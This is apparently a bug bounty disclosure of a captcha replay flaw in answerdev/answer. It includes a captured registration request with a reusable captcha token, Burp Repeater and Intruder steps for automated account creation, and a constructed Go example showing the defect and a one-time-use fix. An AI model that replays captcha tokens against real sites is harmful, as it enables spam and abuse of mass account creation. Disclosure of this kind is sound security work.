Captcha Bypass due to invalidation of previous tokens in answerdev/answer
Valid
Reported on
Feb 22nd 2023
Description
An attacker can bypass the captcha mechanism, because a previously used captcha token is not invalidated, and create multiple accounts directly.
Proof of Concept
1: Sign up with a new name in the application, fill in the captcha and intercept the submit request.
The request will look something like this:
POST /answer/api/v1/user/register/email HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization:
Content-Type: application/json
Content-Length: 123
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/users/register
{"name":"hello","e_mail":"ldjifp@yopmail.com","pass":"Test12345@","captcha_code":"icwb","captcha_id":"OjzH8Dxh9udAm36faCQz"}
2: Forward the same request from Repeater, changing only the email to a new address. Although the captcha token has already been used, it is still accepted and a new user is created directly.
The same can be automated with Burp Intruder: add an insertion point in any part of the email address, supply the corresponding payloads and start the attack. Every request carrying a new email is answered with 200 OK.
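The defect and its fix, as an added Go example that is not the project's own code: the store, handler and second e-mail are a constructed stand-in, while the captcha_id, captcha_code and first e_mail are taken from the captured request above.

```go
package main

import (
	"fmt"
	"sync"
)

// Constructed in-memory stand-in for the server-side challenge store (captcha_id -> code); the project's real storage is not shown on this page.
type captchaStore struct {
	mu      sync.Mutex
	answers map[string]string
}

// verify checks a (captcha_id, captcha_code) pair. consume=false reproduces the
// reported defect: the challenge stays stored, so a replayed pair passes again.
// consume=true deletes it under the lock on the first attempt, right or wrong,
// so a token is accepted at most once and concurrent replays cannot both pass.
func (s *captchaStore) verify(id, code string, consume bool) bool {
	s.mu.Lock()
	defer s.mu.Unlock()
	want, ok := s.answers[id]
	if consume {
		delete(s.answers, id)
	}
	return ok && want == code
}

// register mirrors the /user/register/email handler: an account (keyed by e_mail) is created only if the captcha pair is accepted.
func register(s *captchaStore, consume bool, email, id, code string, users map[string]bool) bool {
	if !s.verify(id, code, consume) {
		return false
	}
	users[email] = true
	return true
}

// replay re-sends the captured token with a second e-mail, as the report describes, and returns whether each registration succeeded.
func replay(consume bool) (first, second bool) {
	s := &captchaStore{answers: map[string]string{"OjzH8Dxh9udAm36faCQz": "icwb"}}
	users := map[string]bool{}
	first = register(s, consume, "ldjifp@yopmail.com", "OjzH8Dxh9udAm36faCQz", "icwb", users)
	second = register(s, consume, "second@example.com", "OjzH8Dxh9udAm36faCQz", "icwb", users)
	return first, second
}

func main() {
	fmt.Println(replay(false)) // true true: a used token still creates an account
	fmt.Println(replay(true))  // true false: the replayed token is rejected
}
```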
Impact
Circumvents the anti-automation mechanism provided by the captcha and allows automated account creation.
We are processing your report and will contact the answerdev/answer team within 24 hours. (3 months ago)
We have contacted a member of the answerdev/answer team and are waiting to hear back. (3 months ago)